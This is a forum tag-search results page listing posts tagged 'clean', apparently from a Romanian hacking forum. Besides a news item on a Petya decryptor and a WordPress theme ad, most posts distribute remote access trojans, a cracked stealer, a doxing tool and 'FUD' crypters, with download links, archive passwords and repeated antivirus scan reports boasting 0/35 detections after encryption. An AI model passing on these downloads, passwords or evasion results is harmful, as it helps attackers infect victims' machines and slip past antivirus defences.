Jump to content

Search the Community

Showing results for tags 'clean'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 13 results

  1. Petya ransomware victims can now unlock infected computers without paying. An unidentified programmer has produced a tool that exploits shortfalls in the way the malware encrypts a file that allows Windows to start up. In notes put on code-sharing site Github, he said he had produced the key generator to help his father-in-law unlock his Petya-encrypted computer. The malware, which started circulating in large numbers in March, demands a ransom of 0.9 bitcoins (£265). It hid itself in documents attached to emails purporting to come from people looking for work. Security researcher Lawrence Abrams, from the Bleeping Computer news site, said the key generator could unlock a Petya-encrypted computer in seven seconds. But the key generator requires victims to extract some information from specific memory locations on the infected drive. And Mr Abrams said: "Unfortunately, for many victims extracting this data is not an easy task." This would probably involve removing the drive and then connecting it up to another virus-free computer running Windows, he said. Another tool can then extract the data, which can be used on the website set up to help people unlock their computer. Independent security analyst Graham Cluley said there had been other occasions when ransomware makers had "bungled" their encryption system. Cryptolocker, Linux.encoder and one other ransomware variant were all rendered harmless when their scrambling schemes were reverse-engineered. "Of course," said Mr Cluley, "the best thing is to have safety secured backups rather than relying upon ransomware criminals goofing up." SOURCE
  2. Still-Born-Rat Image: Size: 2.3 MB md5sum: fcec1dcfe59a9d9f1280d3332d38f81d Download: [url=http://speedy.sh/Xfr7a/STBRAT.tar.gz]STBRAT.tar.gz - Speedy Share - upload your files here[/url] Status: [COLOR="#00FF00"]clean[/COLOR] RazStealer2 v 0.5 Size: 6.2 MB md5sum: 927e07de09968d1187d58771f75c6c02 Download: [url=http://speedy.sh/fsU2N/RazStealer-2-Cracked.tar.gz]RazStealer 2 Cracked.tar.gz - Speedy Share - upload your files here[/url] Status: [COLOR="#00FF00"]clean[/COLOR] AndroRat Size: 9.1 MB md5sum: 43c72352444deff10abb928c3f0b2f66 Download: [url=http://speedy.sh/aNxtb/Androrat.tar.gz]Androrat.tar.gz - Speedy Share - upload your files here[/url] Status: [COLOR="#00FF00"]clean[/COLOR] DroidJack v 4.0 uncracked Size: 17.8 MB md5sum: 1410e9075b1a5b9294e19523896f6791 Download: [url=http://speedy.sh/xKPd8/DroidJack-v4.0.zip]DroidJack v4.0.zip - Speedy Share - upload your files here[/url] Status: [COLOR="#00FF00"]clean[/COLOR]
  3. File Name: bozok.exe File Size: 87375 Bytes MD5 Hash: 16CC74DBA7C88E3A4A529B77DA759B85 SHA1 Hash: 2b1a346ea95903be892bb8bf0fdbe90b39a72fb8 Date & Time: 27/06/2015 23:03:50 Detections: 1/35 Status: Infected AVG Free-File Clean!. Avast-File Clean!. AntiVir (Avira)-File Clean!. BitDefender-File Clean!. Clam Antivirus-File Clean!. COMODO Internet Security-File Clean!. Dr.Web-File Clean!. eTrust-Vet-File Clean!. F-PROT Antivirus-File Clean!. F-Secure Internet Security-File Clean!. G Data-File Clean!. IKARUS Security-File Clean!. Kaspersky Antivirus-File Clean!. McAfee-File Clean!. MS Security Essentials-File Clean!. ESET NOD32-Trojan.MSIL\/Injector.ENB Norman-File Clean!. Norton Antivirus-File Clean!. Panda Security-File Clean!. A-Squared-File Clean!. Quick Heal Antivirus-File Clean!. Solo Antivirus-File Clean!. Sophos-File Clean!. Trend Micro Internet Security-File Clean!. VBA32 Antivirus-File Clean!. Zoner AntiVirus-File Clean!. Ad-Aware-File Clean!. BullGuard-File Clean!. FortiClient-File Clean!. K7 Ultimate-File Clean!. NANO Antivirus-File Clean!. Panda CommandLine-File Clean!. SUPERAntiSpyware-File Clean!. Twister Antivirus-File Clean!. VIPRE-File Clean!. Download: Download crypt.rar Pass:475=: >9>>C@EFFIE(Restrik)
  4. CYBERGATE ENCRIPTADO AHORA: [info] Fecha del reporte: Tue, 16 Jun 2015 19:32:48 +0000 Archivo: CyberFUD.exe Tamaño: 2052237 bytes MD5: d530a87aa19d75b6b15015028eacf004 Estado: Limpio Detecciones: 0 de 35 (0%) [Detecciones] A-Squared - Clean AVG Free - Clean Ad-Aware - Clean AntiVir (Avira) - Clean Avast - Clean BitDefender - Clean BullGuard - Clean COMODO Internet Security - Clean Clam Antivirus - Clean Dr.Web - Clean ESET NOD32 - Clean F-PROT Antivirus - Clean F-Secure Internet Security - Clean FortiClient - Clean G Data - Clean IKARUS Security - Clean K7 Ultimate - Clean Kaspersky Antivirus - Clean MS Security Essentials - Clean McAfee - Clean NANO Antivirus - Clean Norman - Clean Norton Antivirus - Clean Panda CommandLine - Clean Panda Security - Clean Quick Heal Antivirus - Clean SUPERAntiSpyware - Clean Solo Antivirus - Clean Sophos - Clean Trend Micro Internet Security - Clean Twister Antivirus - Clean VBA32 Antivirus - Clean VIPRE - Clean Zoner AntiVirus - Clean eTrust-Vet - Clean SPYNET 2.6 ENCRIPTADO AHORA: [info] Fecha del reporte: Tue, 16 Jun 2015 19:34:02 +0000 Archivo: SpyNetFUD.exe Tamaño: 2046093 bytes MD5: 5b9c84424a48942821b0f63c5af9d2fc Estado: Limpio Detecciones: 0 de 35 (0%) [Detecciones] A-Squared - Clean AVG Free - Clean Ad-Aware - Clean AntiVir (Avira) - Clean Avast - Clean BitDefender - Clean BullGuard - Clean COMODO Internet Security - Clean Clam Antivirus - Clean Dr.Web - Clean ESET NOD32 - Clean F-PROT Antivirus - Clean F-Secure Internet Security - Clean FortiClient - Clean G Data - Clean IKARUS Security - Clean K7 Ultimate - Clean Kaspersky Antivirus - Clean MS Security Essentials - Clean McAfee - Clean NANO Antivirus - Clean Norman - Clean Norton Antivirus - Clean Panda CommandLine - Clean Panda Security - Clean Quick Heal Antivirus - Clean SUPERAntiSpyware - Clean Solo Antivirus - Clean Sophos - Clean Trend Micro Internet Security - Clean Twister Antivirus - Clean VBA32 Antivirus - Clean VIPRE - Clean Zoner AntiVirus - Clean eTrust-Vet - Clean DARKCOMET ENCRIPTADO AHORA: [info] Fecha del reporte: Tue, 16 Jun 2015 19:34:55 +0000 Archivo: DarkCometFUD.exe Tamaño: 2422413 bytes MD5: 7dc0186a7c18402b60b322356da976f3 Estado: Limpio Detecciones: 0 de 35 (0%) [Detecciones] A-Squared - Clean AVG Free - Clean Ad-Aware - Clean AntiVir (Avira) - Clean Avast - Clean BitDefender - Clean BullGuard - Clean COMODO Internet Security - Clean Clam Antivirus - Clean Dr.Web - Clean ESET NOD32 - Clean F-PROT Antivirus - Clean F-Secure Internet Security - Clean FortiClient - Clean G Data - Clean IKARUS Security - Clean K7 Ultimate - Clean Kaspersky Antivirus - Clean MS Security Essentials - Clean McAfee - Clean NANO Antivirus - Clean Norman - Clean Norton Antivirus - Clean Panda CommandLine - Clean Panda Security - Clean Quick Heal Antivirus - Clean SUPERAntiSpyware - Clean Solo Antivirus - Clean Sophos - Clean Trend Micro Internet Security - Clean Twister Antivirus - Clean VBA32 Antivirus - Clean VIPRE - Clean Zoner AntiVirus - Clean eTrust-Vet - Clean Dw: Download DH Crypter [MOD MAGGICIANCOR] [100% FUD].rar Password: Indetectables.net - MaggicianCOr
  5. Bozok Server : File Name: eqdt.exe File Size: 107768 Bytes MD5 Hash: 343D7EA16B4028DA9A7A534FA52F5452 SHA1 Hash: 075857329a2664a5326109f59457067f8d22298e Date & Time: 14/06/2015 13:59:07 Detections: 0/35 Status: Clean AVG Free-File Clean!. Avast-File Clean!. AntiVir (Avira)-File Clean!. BitDefender-File Clean!. Clam Antivirus-File Clean!. COMODO Internet Security-File Clean!. Dr.Web-File Clean!. eTrust-Vet-File Clean!. F-PROT Antivirus-File Clean!. F-Secure Internet Security-File Clean!. G Data-File Clean!. IKARUS Security-File Clean!. Kaspersky Antivirus-File Clean!. McAfee-File Clean!. MS Security Essentials-File Clean!. ESET NOD32-File Clean!. Norman-File Clean!. Norton Antivirus-File Clean!. Panda Security-File Clean!. A-Squared-File Clean!. Quick Heal Antivirus-File Clean!. Solo Antivirus-File Clean!. Sophos-File Clean!. Trend Micro Internet Security-File Clean!. VBA32 Antivirus-File Clean!. Zoner AntiVirus-File Clean!. Ad-Aware-File Clean!. BullGuard-File Clean!. FortiClient-File Clean!. K7 Ultimate-File Clean!. NANO Antivirus-File Clean!. Panda CommandLine-File Clean!. SUPERAntiSpyware-File Clean!. Twister Antivirus-File Clean!. VIPRE-File Clean!. Download: Download CRYpTE.rar Pass:wd+IDx5TDd+3E1cGwd+G(TIGO-3FX)
  6. File Name: aty.exe = DarkComet MD5: f766539495d37106b4e090ef0e6a5a86 Date/Time: 1-04-15,07:53:51 File Size: 280134 Bytes Reported by Most-Security.com Status: infected Detection: 2/35 AVG Free File Clean! Avast File Clean! AntiVir (Avira)TR\/Dropper.Gen BitDefender File Clean! Clam Antivirus File Clean! COMODO Internet Security File Clean! Dr.Web File Clean! eTrust-Vet File Clean! F-PROT Antivirus File Clean! F-Secure Internet Security File Clean! G Data File Clean! IKARUS Security File Clean! Kaspersky Antivirus File Clean! McAfee File Clean! MS Security Essentials File Clean! ESET NOD32 File Clean! Norman File Clean! Norton Antivirus File Clean! Panda Security File Clean! A-Squared File Clean! Quick Heal Antivirus File Clean! Solo Antivirus File Clean! SophosMal\/VBDrop-G Trend Micro Internet Security File Clean! VBA32 Antivirus File Clean! Zoner AntiVirus File Clean! Ad-Aware File Clean! BullGuard File Clean! FortiClient File Clean! K7 Ultimate File Clean! NANO Antivirus File Clean! Panda CommandLine File Clean! SUPERAntiSpyware File Clean! Twister Antivirus File Clean! VIPRE File Clean! Download: sters - virus Password rar: eazye
  7. scan file https://www.virustotal.com/en/file/91f706225cb3a430f379b778b5cd114ef9acf553d1755d363828d652d545e5b2/analysis/ clean download Dox Tool : http://up.media1fire.com/bfxcbo4w71hg
  8. download link here : scan info clean :https://www.virustotal.com/nl/file/ea660614b5dc5e668bcfced0e315164319f877cab3d7e17b4bffc5446ea4df19/analysis/1431125872/
  9. Enfold WordPress Theme is a clean, super flexible and fully responsive Theme (try resizing your browser), suited for business websites, shop websites, and users who want to showcase their work on a neat portfolio site. It comes with a plethora of options so you can modify layout, styling, colors and fonts directly from within the backend. Build your own clean skin or use one of 18 predefined skins right out from your WordPress Admin Panel. Download
  10. scan stub File Name: KILL.exe File Size: 151552 Bytes MD5 Hash: 632E21C3C737F1F3691CAD6DF0296CCDCD1D6360A152CDF3706F0FED6890E57E SHA1 Hash: 9bc1f1a8a2626c893d0594936d4ad72faf0ae66a Date & Time: 02/04/2015 09:48:10 a.m. Detections: 0/35 Status: Clean Report by: Most-Security Desktop Scanner v2.0 AVG Free-File Clean!. Avast-File Clean!. AntiVir (Avira)-File Clean!. BitDefender-File Clean!. Clam Antivirus-File Clean!. COMODO Internet Security-File Clean!. Dr.Web-File Clean!. eTrust-Vet-File Clean!. F-PROT Antivirus-File Clean!. F-Secure Internet Security-File Clean!. G Data-File Clean!. IKARUS Security-File Clean!. Kaspersky Antivirus-File Clean!. McAfee-File Clean!. MS Security Essentials-File Clean!. ESET NOD32-File Clean!. Norman-File Clean!. Norton Antivirus-File Clean!. Panda Security-File Clean!. A-Squared-File Clean!. Quick Heal Antivirus-File Clean!. Solo Antivirus-File Clean!. Sophos-File Clean!. Trend Micro Internet Security-File Clean!. VBA32 Antivirus-File Clean!. Zoner AntiVirus-File Clean!. Ad-Aware-File Clean!. BullGuard-File Clean!. FortiClient-File Clean!. K7 Ultimate-File Clean!. NANO Antivirus-File Clean!. Panda CommandLine-File Clean!. SUPERAntiSpyware-File Clean!. Twister Antivirus-File Clean!. VIPRE-File Clean!. scan spynert File Name: spypnet.exe File Size: 449104 Bytes MD5 Hash: 632E21C3C737F1F3691CAD6DF0296CCDCD1D6360A152CDF3706F0FED6890E57E859BBA77095E26E0F14764F96D81F0E9 SHA1 Hash: f20a9e6f4eab457dd1f3cc39a567b781f2b3d0c4 Date & Time: 02/04/2015 09:49:37 a.m. Detections: 0/35 Status: Clean Report by: Most-Security Desktop Scanner v2.0 AVG Free-File Clean!. Avast-File Clean!. AntiVir (Avira)-File Clean!. BitDefender-File Clean!. Clam Antivirus-File Clean!. COMODO Internet Security-File Clean!. Dr.Web-File Clean!. eTrust-Vet-File Clean!. F-PROT Antivirus-File Clean!. F-Secure Internet Security-File Clean!. G Data-File Clean!. IKARUS Security-File Clean!. Kaspersky Antivirus-File Clean!. McAfee-File Clean!. MS Security Essentials-File Clean!. ESET NOD32-File Clean!. Norman-File Clean!. Norton Antivirus-File Clean!. Panda Security-File Clean!. A-Squared-File Clean!. Quick Heal Antivirus-File Clean!. Solo Antivirus-File Clean!. Sophos-File Clean!. Trend Micro Internet Security-File Clean!. VBA32 Antivirus-File Clean!. Zoner AntiVirus-File Clean!. Ad-Aware-File Clean!. BullGuard-File Clean!. FortiClient-File Clean!. K7 Ultimate-File Clean!. NANO Antivirus-File Clean!. Panda CommandLine-File Clean!. SUPERAntiSpyware-File Clean!. Twister Antivirus-File Clean!. VIPRE-File Clean!. DOWNLOAD: Download CrypterFUDSlowet.rar RAR PASSWORD: slowet NU SCANATI CRYPTERU PE VIRUSTOTAL!
  11. DOWNLOAD: Zippyshare.com - Narcis_Crypter_v2 Mod By MCN.rar RAR PASSWORD: MCN CRYPTER FUNCIONA S.O XP sp1 OK XP sp2 OK XP sp3 OK Vista x86 OK Vista x64 OK Windows 7 X86 OK Windows 7 x64 OK Windows 8 X86 OK Windows 8 x64 OK Windows 10 X86 OK Windows 10 x64 OK Test Con bola de Metal y CyberGate v1.07.5 SCAN ANTES [info] Fecha del reporte: Wed, 01 Apr 2015 19:48:03 +0000 Archivo: ShadeSTB Antes.exe Tamaño: 45056 bytes MD5: a6e5a28d605c92fcdf0bcb3d04142acf Estado: Infectado Detecciones: 28 de 35 (80%) Reporte: Just a moment... Reporte generado por Indetectables.net [Detecciones] A-Squared - Gen:Trojan.Heur.ZGY.5 ( AVG Free - Trojan horse Dropper.Generic2.CUS Ad-Aware - Gen:Trojan.Heur.ZGY.5 AntiVir (Avira) - TR/Dropper.Gen Avast - Win32:Evo-gen [susp] BitDefender - Gen:Trojan.Heur.ZGY.5 BullGuard - Gen:Variant.Mikey.10413 COMODO Internet Security - Malware@#16lzzwutry3tf Clam Antivirus - Trojan.VB-21773 Dr.Web - Trojan.MulDrop1.57374 ESET NOD32 - Trojan.Win32/Injector.BLB F-PROT Antivirus - W32/MalwareF.MJEX (exact) F-Secure Internet Security - Gen:Trojan.Heur.ZGY.5 FortiClient - W32/Refroso.BLC!tr G Data - Gen:Trojan.Heur.ZGY.5 IKARUS Security - Trojan.Win32.VBInject K7 Ultimate - Backdoor ( 04c4c3d81 ) Kaspersky Antivirus - Worm.Win32.VBNA.b MS Security Essentials - Trojan:Win32/VBInject.E McAfee - Artemis!A6E5A28D605C NANO Antivirus - Trojan.Win32.VBNA.bsfwy Norman - Gen:Trojan.Heur.ZGY.5 Norton Antivirus - Trojan.Usuge!gen3 Panda CommandLine - Clean Panda Security - Clean Quick Heal Antivirus - Clean SUPERAntiSpyware - Clean Solo Antivirus - Clean Sophos - Mal/VB-OF Trend Micro Internet Security - Clean Twister Antivirus - Trojan.C41BB17EE1308DDA VBA32 Antivirus - infected Trojan.VBRA.013538 VIPRE - VirTool.Win32.VBInject.gen.dg (v) Zoner AntiVirus - Clean eTrust-Vet - Win32/VBInject.C!generic SCAN AHORA [info] Fecha del reporte: Wed, 01 Apr 2015 19:49:38 +0000 Archivo: ShadeSTB.exe Tamaño: 45056 bytes MD5: 3a0bbf4e1a857d7eda8f3f23d9235155 Estado: Limpio Detecciones: 0 de 35 (0%) Reporte: Just a moment... Reporte generado por Indetectables.net [Detecciones] A-Squared - Clean AVG Free - Clean Ad-Aware - Clean AntiVir (Avira) - Clean Avast - Clean BitDefender - Clean BullGuard - Clean COMODO Internet Security - Clean Clam Antivirus - Clean Dr.Web - Clean ESET NOD32 - Clean F-PROT Antivirus - Clean F-Secure Internet Security - Clean FortiClient - Clean G Data - Clean IKARUS Security - Clean K7 Ultimate - Clean Kaspersky Antivirus - Clean MS Security Essentials - Clean McAfee - Clean NANO Antivirus - Clean Norman - Clean Norton Antivirus - Clean Panda CommandLine - Clean Panda Security - Clean Quick Heal Antivirus - Clean SUPERAntiSpyware - Clean Solo Antivirus - Clean Sophos - Clean Trend Micro Internet Security - Clean Twister Antivirus - Clean VBA32 Antivirus - Clean VIPRE - Clean Zoner AntiVirus - Clean eTrust-Vet - Clean [info] Fecha del reporte: Wed, 01 Apr 2015 19:50:57 +0000 Archivo: bola_Metal RC4.exe Tamaño: 65082 bytes MD5: 64d7fd51bfc2cbf6ce57fad8280086bf Estado: Limpio Detecciones: 0 de 35 (0%) Reporte: Just a moment... Reporte generado por Indetectables.net [Detecciones] A-Squared - Clean AVG Free - Clean Ad-Aware - Clean AntiVir (Avira) - Clean Avast - Clean BitDefender - Clean BullGuard - Clean COMODO Internet Security - Clean Clam Antivirus - Clean Dr.Web - Clean ESET NOD32 - Clean F-PROT Antivirus - Clean F-Secure Internet Security - Clean FortiClient - Clean G Data - Clean IKARUS Security - Clean K7 Ultimate - Clean Kaspersky Antivirus - Clean MS Security Essentials - Clean McAfee - Clean NANO Antivirus - Clean Norman - Clean Norton Antivirus - Clean Panda CommandLine - Clean Panda Security - Clean Quick Heal Antivirus - Clean SUPERAntiSpyware - Clean Solo Antivirus - Clean Sophos - Clean Trend Micro Internet Security - Clean Twister Antivirus - Clean VBA32 Antivirus - Clean VIPRE - Clean Zoner AntiVirus - Clean eTrust-Vet - Clean [info] Fecha del reporte: Wed, 01 Apr 2015 19:53:02 +0000 Archivo: bola_Metal XOR.exe Tamaño: 65082 bytes MD5: 6113df24594cc7dea55271a999c0e90b Estado: Limpio Detecciones: 0 de 35 (0%) Reporte: Just a moment... Reporte generado por Indetectables.net [Detecciones] A-Squared - Clean AVG Free - Clean Ad-Aware - Clean AntiVir (Avira) - Clean Avast - Clean BitDefender - Clean BullGuard - Clean COMODO Internet Security - Clean Clam Antivirus - Clean Dr.Web - Clean ESET NOD32 - Clean F-PROT Antivirus - Clean F-Secure Internet Security - Clean FortiClient - Clean G Data - Clean IKARUS Security - Clean K7 Ultimate - Clean Kaspersky Antivirus - Clean MS Security Essentials - Clean McAfee - Clean NANO Antivirus - Clean Norman - Clean Norton Antivirus - Clean Panda CommandLine - Clean Panda Security - Clean Quick Heal Antivirus - Clean SUPERAntiSpyware - Clean Solo Antivirus - Clean Sophos - Clean Trend Micro Internet Security - Clean Twister Antivirus - Clean VBA32 Antivirus - Clean VIPRE - Clean Zoner AntiVirus - Clean eTrust-Vet - Clean [info] Fecha del reporte: Wed, 01 Apr 2015 19:54:38 +0000 Archivo: CyberGate v1.07.5 XOR.exe Tamaño: 348849 bytes MD5: 3c9be5d2cae0da422bd96b6d71a6e734 Estado: Limpio Detecciones: 0 de 35 (0%) Reporte: http://www.indetectables.net/scanner.php?report=38f5e4_g33h1399 Reporte generado por Indetectables.net [Detecciones] A-Squared - Clean AVG Free - Clean Ad-Aware - Clean AntiVir (Avira) - Clean Avast - Clean BitDefender - Clean BullGuard - Clean COMODO Internet Security - Clean Clam Antivirus - Clean Dr.Web - Clean ESET NOD32 - Clean F-PROT Antivirus - Clean F-Secure Internet Security - Clean FortiClient - Clean G Data - Clean IKARUS Security - Clean K7 Ultimate - Clean Kaspersky Antivirus - Clean MS Security Essentials - Clean McAfee - Clean NANO Antivirus - Clean Norman - Clean Norton Antivirus - Clean Panda CommandLine - Clean Panda Security - Clean Quick Heal Antivirus - Clean SUPERAntiSpyware - Clean Solo Antivirus - Clean Sophos - Clean Trend Micro Internet Security - Clean Twister Antivirus - Clean VBA32 Antivirus - Clean VIPRE - Clean Zoner AntiVirus - Clean eTrust-Vet - Clean [info] Fecha del reporte: Wed, 01 Apr 2015 19:56:21 +0000 Archivo: CyberGate v1.07.5 RC4.exe Tamaño: 348849 bytes MD5: 3f16a2d50ca64c1ee8dac3e7c87d7b40 Estado: Limpio Detecciones: 0 de 35 (0%) Reporte: http://www.indetectables.net/scanner.php?report=7dd2fe_g33hdf92 Reporte generado por Indetectables.net [Detecciones] A-Squared - Clean AVG Free - Clean Ad-Aware - Clean AntiVir (Avira) - Clean Avast - Clean BitDefender - Clean BullGuard - Clean COMODO Internet Security - Clean Clam Antivirus - Clean Dr.Web - Clean ESET NOD32 - Clean F-PROT Antivirus - Clean F-Secure Internet Security - Clean FortiClient - Clean G Data - Clean IKARUS Security - Clean K7 Ultimate - Clean Kaspersky Antivirus - Clean MS Security Essentials - Clean McAfee - Clean NANO Antivirus - Clean Norman - Clean Norton Antivirus - Clean Panda CommandLine - Clean Panda Security - Clean Quick Heal Antivirus - Clean SUPERAntiSpyware - Clean Solo Antivirus - Clean Sophos - Clean Trend Micro Internet Security - Clean Twister Antivirus - Clean VBA32 Antivirus - Clean VIPRE - Clean Zoner AntiVirus - Clean eTrust-Vet - Clean [info] Fecha del reporte: Wed, 01 Apr 2015 19:58:00 +0000 Archivo: SpyNet2.6 RC4.exe Tamaño: 342705 bytes MD5: 587cd3e9987aa5550d8bd79f92fb6f98 Estado: Limpio Detecciones: 0 de 35 (0%) Reporte: http://www.indetectables.net/scanner.php?report=1c29cb_g33hr366 Reporte generado por Indetectables.net [Detecciones] A-Squared - Clean AVG Free - Clean Ad-Aware - Clean AntiVir (Avira) - Clean Avast - Clean BitDefender - Clean BullGuard - Clean COMODO Internet Security - Clean Clam Antivirus - Clean Dr.Web - Clean ESET NOD32 - Clean F-PROT Antivirus - Clean F-Secure Internet Security - Clean FortiClient - Clean G Data - Clean IKARUS Security - Clean K7 Ultimate - Clean Kaspersky Antivirus - Clean MS Security Essentials - Clean McAfee - Clean NANO Antivirus - Clean Norman - Clean Norton Antivirus - Clean Panda CommandLine - Clean Panda Security - Clean Quick Heal Antivirus - Clean SUPERAntiSpyware - Clean Solo Antivirus - Clean Sophos - Clean Trend Micro Internet Security - Clean Twister Antivirus - Clean VBA32 Antivirus - Clean VIPRE - Clean Zoner AntiVirus - Clean eTrust-Vet - Clean [info] Fecha del reporte: Wed, 01 Apr 2015 19:59:37 +0000 Archivo: SpyNet2.6 XOR.exe Tamaño: 342705 bytes MD5: 98c0ce6a7e9f4cfcc9fc77625c413991 Estado: Limpio Detecciones: 0 de 35 (0%) Reporte: http://www.indetectables.net/scanner.php?report=30e85a_g33i9n81 Reporte generado por Indetectables.net [Detecciones] A-Squared - Clean AVG Free - Clean Ad-Aware - Clean AntiVir (Avira) - Clean Avast - Clean BitDefender - Clean BullGuard - Clean COMODO Internet Security - Clean Clam Antivirus - Clean Dr.Web - Clean ESET NOD32 - Clean F-PROT Antivirus - Clean F-Secure Internet Security - Clean FortiClient - Clean G Data - Clean IKARUS Security - Clean K7 Ultimate - Clean Kaspersky Antivirus - Clean MS Security Essentials - Clean McAfee - Clean NANO Antivirus - Clean Norman - Clean Norton Antivirus - Clean Panda CommandLine - Clean Panda Security - Clean Quick Heal Antivirus - Clean SUPERAntiSpyware - Clean Solo Antivirus - Clean Sophos - Clean Trend Micro Internet Security - Clean Twister Antivirus - Clean VBA32 Antivirus - Clean VIPRE - Clean Zoner AntiVirus - Clean eTrust-Vet - Clean [info] Fecha del reporte: Wed, 01 Apr 2015 20:01:03 +0000 Archivo: Cybergate+Tcpview Binder RC4.exe Tamaño: 649682 bytes MD5: b6408529ac81152ff3f3b31ff05009bc Estado: Limpio Detecciones: 0 de 35 (0%) Reporte: http://www.indetectables.net/scanner.php?report=711bb0_g33ipl45 Reporte generado por Indetectables.net [Detecciones] A-Squared - Clean AVG Free - Clean Ad-Aware - Clean AntiVir (Avira) - Clean Avast - Clean BitDefender - Clean BullGuard - Clean COMODO Internet Security - Clean Clam Antivirus - Clean Dr.Web - Clean ESET NOD32 - Clean F-PROT Antivirus - Clean F-Secure Internet Security - Clean FortiClient - Clean G Data - Clean IKARUS Security - Clean K7 Ultimate - Clean Kaspersky Antivirus - Clean MS Security Essentials - Clean McAfee - Clean NANO Antivirus - Clean Norman - Clean Norton Antivirus - Clean Panda CommandLine - Clean Panda Security - Clean Quick Heal Antivirus - Clean SUPERAntiSpyware - Clean Solo Antivirus - Clean Sophos - Clean Trend Micro Internet Security - Clean Twister Antivirus - Clean VBA32 Antivirus - Clean VIPRE - Clean Zoner AntiVirus - Clean eTrust-Vet - Clean [info] Fecha del reporte: Wed, 01 Apr 2015 20:03:13 +0000 Archivo: Cybergate+Tcpview Binder XOR.exe Tamaño: 649682 bytes MD5: d31d40c1af20f5dcdfbd35e2561f5193 Estado: Limpio Detecciones: 0 de 35 (0%) Reporte: http://www.indetectables.net/scanner.php?report=1a507d_g33jn562 Reporte generado por Indetectables.net [Detecciones] A-Squared - Clean AVG Free - Clean Ad-Aware - Clean AntiVir (Avira) - Clean Avast - Clean BitDefender - Clean BullGuard - Clean COMODO Internet Security - Clean Clam Antivirus - Clean Dr.Web - Clean ESET NOD32 - Clean F-PROT Antivirus - Clean F-Secure Internet Security - Clean FortiClient - Clean G Data - Clean IKARUS Security - Clean K7 Ultimate - Clean Kaspersky Antivirus - Clean MS Security Essentials - Clean McAfee - Clean NANO Antivirus - Clean Norman - Clean Norton Antivirus - Clean Panda CommandLine - Clean Panda Security - Clean Quick Heal Antivirus - Clean SUPERAntiSpyware - Clean Solo Antivirus - Clean Sophos - Clean Trend Micro Internet Security - Clean Twister Antivirus - Clean VBA32 Antivirus - Clean VIPRE - Clean Zoner AntiVirus - Clean eTrust-Vet - Clean [info] Fecha del reporte: Wed, 01 Apr 2015 20:04:23 +0000 Archivo: SPYNET2.6+RESHACKER RC4.exe Tamaño: 1281714 bytes MD5: 6c49962ff10126bf7e97d130359cbca1 Estado: Limpio Detecciones: 0 de 35 (0%) Reporte: http://www.indetectables.net/scanner.php?report=22bf75_g33k9118 Reporte generado por Indetectables.net [Detecciones] A-Squared - Clean AVG Free - Clean Ad-Aware - Clean AntiVir (Avira) - Clean Avast - Clean BitDefender - Clean BullGuard - Clean COMODO Internet Security - Clean Clam Antivirus - Clean Dr.Web - Clean ESET NOD32 - Clean F-PROT Antivirus - Clean F-Secure Internet Security - Clean FortiClient - Clean G Data - Clean IKARUS Security - Clean K7 Ultimate - Clean Kaspersky Antivirus - Clean MS Security Essentials - Clean McAfee - Clean NANO Antivirus - Clean Norman - Clean Norton Antivirus - Clean Panda CommandLine - Clean Panda Security - Clean Quick Heal Antivirus - Clean SUPERAntiSpyware - Clean Solo Antivirus - Clean Sophos - Clean Trend Micro Internet Security - Clean Twister Antivirus - Clean VBA32 Antivirus - Clean VIPRE - Clean Zoner AntiVirus - Clean eTrust-Vet - Clean [info] Fecha del reporte: Wed, 01 Apr 2015 20:05:39 +0000 Archivo: SPYNET2.6+RESHACKER XOR.exe Tamaño: 1281714 bytes MD5: d874a805c00cbfcdce0dd41662c6de7f Estado: Limpio Detecciones: 0 de 35 (0%) Reporte: http://www.indetectables.net/scanner.php?report=1e641d_g33kmn78 Reporte generado por Indetectables.net [Detecciones] A-Squared - Clean AVG Free - Clean Ad-Aware - Clean AntiVir (Avira) - Clean Avast - Clean BitDefender - Clean BullGuard - Clean COMODO Internet Security - Clean Clam Antivirus - Clean Dr.Web - Clean ESET NOD32 - Clean F-PROT Antivirus - Clean F-Secure Internet Security - Clean FortiClient - Clean G Data - Clean IKARUS Security - Clean K7 Ultimate - Clean Kaspersky Antivirus - Clean MS Security Essentials - Clean McAfee - Clean NANO Antivirus - Clean Norman - Clean Norton Antivirus - Clean Panda CommandLine - Clean Panda Security - Clean Quick Heal Antivirus - Clean SUPERAntiSpyware - Clean Solo Antivirus - Clean Sophos - Clean Trend Micro Internet Security - Clean Twister Antivirus - Clean VBA32 Antivirus - Clean VIPRE - Clean Zoner AntiVirus - Clean eTrust-Vet - Clean [info] Fecha del reporte: Wed, 01 Apr 2015 20:07:10 +0000 Archivo: Tcpview + ResHacker + RC4.exe Tamaño: 1285074 bytes MD5: 352ecf435e248715b1f1e7f6d77b43d6 Estado: Limpio Detecciones: 0 de 35 (0%) Reporte: http://www.indetectables.net/scanner.php?report=3ac9f3_g33l6l43 Reporte generado por Indetectables.net [Detecciones] A-Squared - Clean AVG Free - Clean Ad-Aware - Clean AntiVir (Avira) - Clean Avast - Clean BitDefender - Clean BullGuard - Clean COMODO Internet Security - Clean Clam Antivirus - Clean Dr.Web - Clean ESET NOD32 - Clean F-PROT Antivirus - Clean F-Secure Internet Security - Clean FortiClient - Clean G Data - Clean IKARUS Security - Clean K7 Ultimate - Clean Kaspersky Antivirus - Clean MS Security Essentials - Clean McAfee - Clean NANO Antivirus - Clean Norman - Clean Norton Antivirus - Clean Panda CommandLine - Clean Panda Security - Clean Quick Heal Antivirus - Clean SUPERAntiSpyware - Clean Solo Antivirus - Clean Sophos - Clean Trend Micro Internet Security - Clean Twister 